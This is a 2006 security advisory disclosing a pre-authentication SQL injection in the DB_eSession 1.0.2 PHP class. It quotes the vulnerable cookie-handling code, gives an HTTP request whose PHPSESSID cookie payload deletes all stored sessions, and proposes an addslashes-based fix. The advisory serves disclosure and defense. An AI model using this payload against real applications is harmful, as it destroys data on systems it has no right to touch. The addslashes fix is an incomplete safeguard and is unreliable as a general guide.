DBeSession102.txt

`##########################################################  
# GulfTech Security Research February 11, 2006  
##########################################################  
# Vendor : Lawrence Osiris  
# URL : http://www.phpclasses.org/browse/package/1624.html  
# Version : DB_eSession 1.0.2  
# Risk : SQL Injection  
##########################################################  
  
  
Description:  
DB_eSession is a feature-packed PHP class that stores the  
session data in a MySQL database rather than files. It is  
powerful, designed with security in mind, and is easy to  
utilize. The DB_eSession library is used in a number of  
popular web applications, and private projects alike.  
DB_eSession is vulnerable to SQL Injection attacks due to  
unsafe use of cookie data in an SQL query, and can allow an  
attacker to craft malicious SQL Queries and have them then  
successfully executed.  
  
  
  
SQL Injection:  
There is an SQL injection vulnerability in DB_eSession that  
allow for an attacker to perform pre authentication SQL  
Injection attacks against the vulnerable web application.  
  
/**  
* Try and save the current session ID if one is defined already.  
*/  
if (isSet($_COOKIE[$this->_sess_name]))  
$_sess_id_set = $_COOKIE[$this->_sess_name];  
else  
if (isSet($GLOBALS[$this->_sess_name]))  
$_sess_id_set = $GLOBALS[$this->_sess_name];  
else  
$_sess_id_set = NULL;  
  
The above code is from DB_eSession class @ lines 1080 - 1090  
The variable $this->_sess_name is in most cases PHPSESSID, or  
set to a developer specified value. You should be able to tell  
from having a look at your cookies.  
  
GET /example/index.php HTTP/1.1  
Host: example.org  
User-Agent: Mozilla/5.0  
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Cookie: PHPSESSID=143263645564654563456345634563435%00' or 1=1/*  
  
The above request would successfully delete all of the sessions  
in the database. The reason for the null byte is to get past  
having the application die @ line 1134. Depending on what the  
version of MySQL in use is, other attacks may be possible. The  
root of this problem is that unsafe data is taken from a cookie  
value and then passed to the deleteSession() function where it  
is then used in an SQL query.  
  
  
  
Solution:  
The vendor was unresponsive to my contact attempts, but a fix is  
not too difficult @ line 1092 add the following code below the  
code shown @1080-1090  
  
$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);  
  
This should effectively stop any SQL Injection attacks against the  
vulnerable DB_eSession class.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00099-02112006  
`